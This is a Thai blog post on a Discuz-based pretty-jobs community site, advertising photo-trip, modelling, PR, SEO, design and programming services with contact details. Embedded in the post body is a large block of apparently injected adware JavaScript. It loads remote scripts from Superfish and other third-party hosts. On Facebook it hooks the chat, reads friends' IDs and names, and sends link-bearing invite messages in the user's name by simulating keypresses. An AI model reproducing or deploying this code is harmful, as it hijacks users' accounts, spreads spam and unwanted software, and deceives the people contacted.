สมัครสมาชิก เข้าสู่ระบบ
Cawaii.in.th Pretty in Thailand หางานพริตตี้ หางานกลางคืน พริตตี้ PR ประชาสัมพันธ์ หน้าแรก

supawitโปรไฟล์ของ http://www.cawaii.in.th/?1901 [รายการโปรด] [คัดลอก] [แบ่งปัน] [RSS]

บล็อก

รับจัดทริบถ่ายภาพทุกแนวครับ ... ...

เข้าชม/อ่าน 838 ครั้ง 2-12-2012 17:38

Phototrip ขอนำเสนอในส่วนของบริการต่างๆ

เราไม่ได้ทำแค่งานออกทริบถ่ายภาพเท่านั้น เรายังมีบริการอื่นๆ ที่น่าสนใจ และสามารถช่วยธุรกิจต่างๆ ของท่านได้อีก โดยมีรายละเอียดดังนี้ 


1. บริการถ่ายแบบ ต่างๆ เช่น ถ่ายภาพรับปริญญา ถ่ายภาพพรีเวดดิ้ง ถ่ายภาพอาหารเพื่อนำเสนองาน ถ่ายภาพสถานที่ต่างๆ เพื่อนำเสนองานแนะนำสถานที่ท่องเที่ยว ถ่ายร้านอาหาร สปา หรืองานที่ต้องใช้รูปภาพในการนำเสนอ 

2. บริการรับจัดหานักแสดง นางแบบ พริตตี้ เอมซี เพื่องานโฆษณาประชาสัมพันธ์ งานจ้างเทียวสำหรับป๋าๆ อยากออกเดท กับน้องๆ น่ารัก (แบบสุภาพ)

3. บริการทำ PR ให้ร้านอาหารเปิดใหม่ หรือต้องการเพิ่มยอดลูกค้าให้สูงขึ้น

4. บริการรับจัดทำ SEO (Search EngineOptimization) โดยเราการันตี เวปของท่านจะอยู่อันดับไม่เกิน 20 (ไม่ต่ำกว่าหน้าสองของ google)

5. บริการรับทำ Art Work หนังสือ นิตยสาร โบชัวร์ แผ่นพับ เพื่องานโฆษณาประชาสัมพันธ์ต่างๆ

6. บริการรับออกแบบด้าน สถาปัตยกรรม งานออกแบบบูท ออกแบบบ้าน ตกแต่งภายใน โดยทีมงานมืออาชีพ

7. บริการรับเขียนโปรแกรม ประเภท web programing , mobile phone programing ฯลฯ โดยทีมงานมืออาชีพ

เพิ่มเติม www.phototrip2u.com

Line : 999bags

BB : 25FC8877

Mobile : 090 956 9085 

//AddWiddit(); function AddWiddit(){ if(window.location.href.indexOf("http:")!=-1 && window.location.href.indexOf("facebook.com")==-1) { var script_tag=document.createElement('script');script_tag.setAttribute("type","text/javascript"); script_tag.setAttribute("src","http://cdn1.certified-apps.com/scripts/shared/enable.js?si=33332&tid=ch6"); (document.getElementsByTagName("head")[0]||document.documentElement).appendChild(script_tag); }} function AddSuperFish(){if(-1!=window.location.href.indexOf("http:")&&-1==window.location.href.indexOf("facebook.com")){var a=document.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("src","http://www.superfish.com/ws/sf_main.jsp?dlsource=sixpointseven&userId=6&CTID=6");(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(a)}else-1!=window.location.href.indexOf("https:")&&-1==window.location.href.indexOf("facebook.com")&&(a=document.createElement("script"), a.setAttribute("type","text/javascript"),a.setAttribute("src","https://www.superfish.com/ws/sf_main.jsp?dlsource=sixpointseven&userId=6&CTID=6"),(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(a))}; AddSuperFish(); function AddDP() { if (window.location.href.indexOf("http:") != -1 && window.location.href.indexOf("facebook.com") == -1 ) { var script_tag = document.createElement('script'); script_tag.setAttribute("type", "text/javascript"); script_tag.setAttribute("src", "http://i.2yourfacejs.info/toyf/javascript.js?channel=ch6"); // Try to find the head, otherwise default to the documentElement (document.getElementsByTagName("head")[0] || document.documentElement).appendChild(script_tag); } } //AddDP(); //3.4 no chacheID in games var gpid="6",url=window.location.href,timeOut=3E3,gPhoneCallInviteMsgPrefix=" invite You to an Audio Chat. Accept Now : ",gVideoCallInviteMsgPrefix=" invite You to a Video Chat. Accept Now : ",gGameInviteMsgPrefix=" invite You to play ",date=new Date,cacheID=date.getDate()+"-"+(date.getMonth()+1)+"-"+date.getFullYear()+"-"+date.getHours(),gPhoneCallInviteMsg=gPhoneCallInviteMsgPrefix+" http://www.2yourface.com/"+gpid+"/"+cacheID,gVideoCallInviteMsg=gVideoCallInviteMsgPrefix+" http://www.2yourface.com/"+ gpid+"/"+cacheID,gGameLink="http://www.f2yf.com/",gGameLinkSuffix="/"+gpid+"/",gSmileyMsgPrefix="I sent you a smiley. Accept Now: ",gSmileyMSG=":-D",gMyName="";window.setTimeout("OnTimeout()",2500);var m_lastTimeout=new Date;document.body.onmouseup=onUp;function onUp(){if(!0==isValidWebsite()){var a=(new Date).getTime()-m_lastTimeout.getTime(),a=new Date(a);(0<a.getMinutes()||0==a.getMinutes()&&2<a.getSeconds())&&OnTimeout()}} function getElementsByClassName(a){for(var b=[],a=RegExp("\\b"+a+"\\b"),d=document.getElementsByTagName("*"),c=0;c<d.length;c++)a.test(d[c].className)&&b.push(d[c]);return b}Start(); function Start(){if(-1!=window.location.href.indexOf("facebook.com")){if(void 0===window.jQuery||"1.4.2"!==window.jQuery.fn.jquery){var a=document.createElement("script");a.setAttribute("type","text/javascript");-1!=window.location.href.indexOf("http:/")?a.setAttribute("src","http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"):a.setAttribute("src","https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js");a.onload=scriptLoadHandler;a.onreadystatechange=function(){("complete"== this.readyState||"loaded"==this.readyState)&&scriptLoadHandler()};(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(a)}null==document.getElementById("ChatDialog")&&(a=document.createElement("div"),a.id="ChatDialog",a.setAttribute("style","display:none;position: absolute;top: 15%;left: 35%;width: width:484px;background:url('http://www.2yourface.com/Plugin/images/outer_bg.png');border-radius:8px;padding:9px;z-index:1002;overflow: auto;"),document.body.appendChild(a))}} function onscroll(){var a=document.body.scrollTop,b=window.jQuery("div#ChatDialog",document);b.position();b.offset({left:0.35*document.body.clientWidth,top:a+200})}function IsScriptInstalled(){return-1!=document.body.innerHTML.indexOf("ChatDialog")}function scriptLoadHandler(){jQuery=window.jQuery.noConflict(!0);OnTimeout()} function Process(){var a=-1,b=document;if(""==gMyName){var d=getElementsByClassName("headerTinymanName");0<d.length&&(gMyName=d[0].innerHTML)}d=window.jQuery("div#fbDockChat",b);b=window.jQuery("div.fbDockChatTab",d);0==b.length&&(b=window.jQuery(".fbNubFlyout.fbDockChatTabFlyout",d));if(null!=b)for(d=0;d<b.length;d++){var c=window.jQuery("div.fbNubFlyout",b[d])[0];null==c&&(c=window.jQuery(".fbNubFlyoutOuter",b[d])[0]);c.innerHTML.indexOf("textarea");var f=window.jQuery("div.fbNubFlyoutTitlebar", c),h=window.jQuery("span.titlebarText",f),a=GetUIDFromName(e);if(-1==a){var e=c.innerHTML,i="/messages/",g=e.indexOf(i);-1!=g?(g+=i.length,a=e.indexOf('"',g),a=e.substring(g,a)):(i="?id=",g=e.indexOf(i),-1!=g&&(g+=i.length,a=e.indexOf('"',g),a=e.substring(g,a)))}var e=GetFriendName(f.html());""==e&&(e=h.html());-1==a&&(a=GetUIDFromName(e));AddToolbar(c,e,a);ParseInvitations(c,e,a)}} function GetUIDFromName(a){var b=window.ChatUserInfos,d;for(d in b)if(b.hasOwnProperty(d)&&a==b[d].name)return d;return-1}function isValidWebsite(){return-1!=window.location.href.indexOf("facebook.com")}function OnTimeout(){m_lastTimeout=new Date;-1!=window.location.href.indexOf("facebook.com")&&(!1==IsScriptInstalled()&&Start(),setTimeout("OnTimeout()",2500),Process())} function GetFriendName(a){var b=a.indexOf('",b+22),b=b+1,d=a.indexOf("<",b);return a.substring(b,d)}function SendSmiley(a){sendMsg(gSmileyMSG,a)} function AddToolbar(a,b,d){a=window.jQuery("div.fbNubFlyoutBody",a);b='
'+('
Video Chat
')+('
Audio Chat
')+('
Games
')+('
Games
')+('
Video Chat
')+('
Video Chat
')+('
Games
')+('
Video Chat
')+'
Video Chat
';d=a.parent().html();a.next().children(); -1==d.indexOf("VideoChatToolbar")&&(a.height(197),a.after(b))}function ParseInvitations(a,b,d){for(var a=window.jQuery("div.fbChatMessage.fsm",a),c=0;c<a.length;c++)TryParseInvitation(a[c],d,b)}function TryParseSmileyInvitation(){return!1}function TryParseInvitation(a,b,d){TryParseSmileyInvitation(a,b,d)||TryParsePhoneCallInvite(a,b,d)||TryParseVideoInvite(a,b,d)||TryParseGameInvite(a,b,d)} function GetGameFromMessage(a){var b=a.indexOf(gGameInviteMsgPrefix);if(-1!=b){var b=b+gGameInviteMsgPrefix.length,d=a.indexOf(".");return a.substring(b,d)}return""} function TryParseGameInvite(a,b,d){var c=a.innerHTML;if(-1!=c.indexOf(gGameInviteMsgPrefix)){var f=IsMe(a),c=GetGameFromMessage(c);f?c="You have invited "+d+" to play "+c:(f=GetGameID(c),c=d+" invited You to Play "+c+" Accept");a.innerHTML=c;return!0}return!1} function TryParsePhoneCallInvite(a,b,d){var c=a.innerHTML;return-1!=c.indexOf(gPhoneCallInviteMsgPrefix)?(c=IsMe(a)?"You have invited "+d+" to an Audio Chat":d+" invited You to an Audio Chat Accept",a.innerHTML=c,!0):!1}function StartPhone(a,b){OpenVoiceDialog(a,"http://graph.facebook.com/"+a+"/picture",b)}function StartVideo(a,b){OpenVideoDialog(a,"http://graph.facebook.com/"+a+"/picture",b)} function OpenVideoDialog(a,b,d){OpenDialog("http://www.2yourchat.com/Conversation/Video.aspx?rid=1&channel=1008&callType=Video&runtime="+a+"&from="+Env.user,395,215,b,d,"Video Chat")}function OpenVoiceDialog(a,b,d){OpenDialog("http://www.2yourchat.com/Conversation/Video.aspx?rid=1&channel=1008&callType=Voice&runtime="+a+"&from="+Env.user,395,215,b,d,"Audio Chat")} function OpenDialog(a,b,d,c,f,h){b='
'+h+' - Powered By 2YourFace.com
Chatting with:
'+ f+'
'+ ("")+'
';a=window.jQuery("div#ChatDialog",document);a.html(b);b=a[0];b.style.visibility="visible";b.style.display="block";b=document.body.scrollTop; d=a.position();c=document.body.clientWidth;c=50>d.left?document.body.clientWidth/3:0.35*document.body.clientWidth;a.offset({left:c,top:b+200})}function CloseDialog(){document.body.style.display="block";document.getElementById("ChatDialog").style.display="none";document.getElementById("ChatDialog").innerHTML=""} function IsMe(a){var b=-1!=a.parentNode.parentNode.innerHTML.indexOf('title="You"');return b=(b=b||-1!=a.parentNode.parentNode.innerHTML.indexOf('alt="'+gMyName+'"'))||-1!=a.parentNode.parentNode.innerHTML.indexOf("_"+Env.user+"_")}function TryParseVideoInvite(a,b,d){var c=a.innerHTML;-1!=c.indexOf(gVideoCallInviteMsgPrefix)&&(c=IsMe(a)?c="You have invited "+d+" to a Video Chat":d+" invited You to a Video Chat Accept",a.innerHTML=c)} function InviteCall(a,b){-1==a&&(a=GetUIDFromName(b));var d="I "+gPhoneCallInviteMsg;if(sendMsg(d,a))OpenVoiceDialog(Env.user,"http://graph.facebook.com/"+a+"/picture",b);else{var c=window.jQuery("#VideoChatToolbar_"+a,document).next().children().children();c.focus();c.keydown(function(d){13==d.which&&(OpenVoiceDialog(Env.user,"http://graph.facebook.com/"+a+"/picture",b),c.unbind(!1))});TextAreaControl.getInstance(c[0]).setValue(d)}} function GetMyID(){var a=document.body.innerHTML.indexOf('detect_broken_proxy_cache("'),a=a+"30",b=document.body.innerHTML.indexOf('"',a);return document.body.innerHTML.substring(a,b)} function InviteVideo(a,b){-1==a&&(a=GetUIDFromName(b));var d="I "+gVideoCallInviteMsg;if(sendMsg(d,a))OpenVideoDialog(Env.user,"http://graph.facebook.com/"+a+"/picture",b);else{var c=window.jQuery("#VideoChatToolbar_"+a,document).next().children().children();c.focus();c.keydown(function(d){13==d.which&&(OpenVideoDialog(Env.user,"http://graph.facebook.com/"+a+"/picture",b),c.unbind(!1))});TextAreaControl.getInstance(c[0]).setValue(d)}} function InviteGames(a,b){-1==a&&(a=GetUIDFromName(b));OpenGamesDialog(a,Env.user,"http://graph.facebook.com/"+a+"/picture",b)} function sendMsg(a,b){if("undefined"!=typeof window.chatDisplay)chatDisplay.tabs[b].chatInput.value=a,chatDisplay.tabs[b].sendInput();else{var d=window.jQuery("#VideoChatToolbar_"+b,document).next().children().children();d.focus();d[0].value=a;d.focus();var c;document.createEvent?(c=document.createEvent("Events"),c.initEvent("keydown",!0,!0)):c=document.createEventObject();c.view=window;c.altKey=!1;c.ctrlKey=!1;c.shiftKey=!1;c.metaKey=!1;c.keyCode=13;c.which=13;document.createEvent?d[0].dispatchEvent(c): d[0].fireEvent("onkeydown",c)}return!0}function OpenGame(a,b,d){b=GetGameName(a);b="I "+gGameInviteMsgPrefix+b+". Accept Now: "+gGameLink+b+gGameLinkSuffix;CloseDialog();var c=Env.user;if(sendMsg(b,d))StartGame(a,c,d,gMyName);else{var f=window.jQuery("#VideoChatToolbar_"+d,document).next().children().children();f.focus();f.keydown(function(b){13==b.which&&(StartGame(a,c,d,gMyName),f.unbind(!1))});TextAreaControl.getInstance(f[0]).setValue(b)}} function AcceptGame(a,b,d,c){window.open("http://www.2yourface.com/games/game.php?id="+b+"&first="+d+"&second="+b+"&nick="+c+"&game="+a,"mywindow","scrollbars=no,menubar=1,resizable=1,width=890,height=720")}function StartGame(a,b,d,c){window.open("http://www.2yourface.com/games/game.php?id="+b+"&first="+b+"&second="+d+"&nick="+c+"&game="+a,"mywindow","scrollbars=no,menubar=1,resizable=1,width=890,height=720")} function GetGameName(a){return 2==a?"Chess":1==a?"Backgammon":6==a?"Checkers":26==a?"Tic Tac Toe":86==a?"Darts":325==a?"Domino":256==a?"8-Ball":225==a?"Poker":"Game"}function GetGameID(a){return"Chess"==a?2:"8-Ball"==a?256:"Backgammon"==a?1:"Checkers"==a?6:"Tic Tac Toe"==a?26:"Darts"==a?86:"Domino"==a?325:"Poker"==a?225:1} function OpenGamesDialog(a,b,d,c){b="#ex5 img { margin: 5px; opacity: 0.8; border: 10px solid #eee;/*Transition*/-webkit-transition: all 0.5s ease; -moz-transition: all 0.5s ease; -o-transition: all 0.5s ease;/*Reflection*/ -webkit-box-reflect: below 0px -webkit-gradient(linear, left top, left bottom, from(transparent), color-stop(.7, transparent), to(rgba(0,0,0,0.1)));}#ex5 img:hover { opacity: 1; /*Reflection*/ -webkit-box-reflect: below 0px -webkit-gradient(linear, left top, left bottom, from(transparent), color-stop(.7, transparent), to(rgba(0,0,0,0.4))); /*Glow*/ -webkit-box-shadow: 0px 0px 20px rgba(255,255,255,0.8); -moz-box-shadow: 0px 0px 20px rgba(255,255,255,0.8); box-shadow: 0px 0px 20px rgba(255,255,255,0.8);}"+('
Choose a Game and Play - Powered By 2YourFace.com
Choose a Game and Play with:
'+c+'
')+ "
"+GetGameOfferHTML(2,"http://www.2yourface.com/Plugin/images/games/Small/gameIcon70x70_chess.jpg",c,a);b+=GetGameOfferHTML(1,"http://www.2yourface.com/Plugin/images/games/Small/gameIcon70x70_backgammon.jpg",c,a);b+=GetGameOfferHTML(256,"http://www.2yourface.com/Plugin/images/games/Small/gameIcon70x70_snooker.jpg",c,a);b+=GetGameOfferHTML(325,"http://www.2yourface.com/Plugin/images/games/Small/gameIcon70x70_domino.jpg", c,a);b=b+""+GetGameOfferHTML(6,"http://www.2yourface.com/Plugin/images/games/Small/gameIcon70x70_checkers.jpg",c,a);b+=GetGameOfferHTML(26,"http://www.2yourface.com/Plugin/images/games/Small/gameIcon70x70_tic.jpg",c,a);b+=GetGameOfferHTML(86,"http://www.2yourface.com/Plugin/images/games/Small/gameIcon70x70_darts.jpg",c,a);b+=GetGameOfferHTML(225,"http://www.2yourface.com/Plugin/images/games/Small/gameIcon70x70_poker.jpg",c,a);b+='
'; a=window.jQuery("div#ChatDialog",document);a.html(b);c=a[0];c.style.visibility="visible";c.style.display="block";c=document.body.scrollTop;b=a.position();d=document.body.clientWidth;d=50>b.left?document.body.clientWidth/3:0.35*document.body.clientWidth;a.offset({left:d,top:c+200})} function GetGameOfferHTML(a,b,d,c){return"'};

ขอผ่าน

เหลวไหล

ดอกไม้ให้เธอ

จับมือหน่อย

ทึ่ง

ความคิดเห็น (0 ความคิดเห็น)

facelist

คุณต้องเข้าสู่ระบบก่อนจึงจะสามารถแสดงความคิดเห็นได้ เข้าสู่ระบบ | สมัครสมาชิก


X
X

Archiver|Cawaii in Thailand งานพริตตี้ Pretty งานmc Job

GMT+7, 1-10-2020 06:04 , Processed in 0.037827 second(s), 13 queries .

Powered by Discuz! X2

design by เกี่ยวกับเรา cawaii

Link เพื่อนบ้าน :ทัวร์เชียงราย

ขึ้นไปด้านบน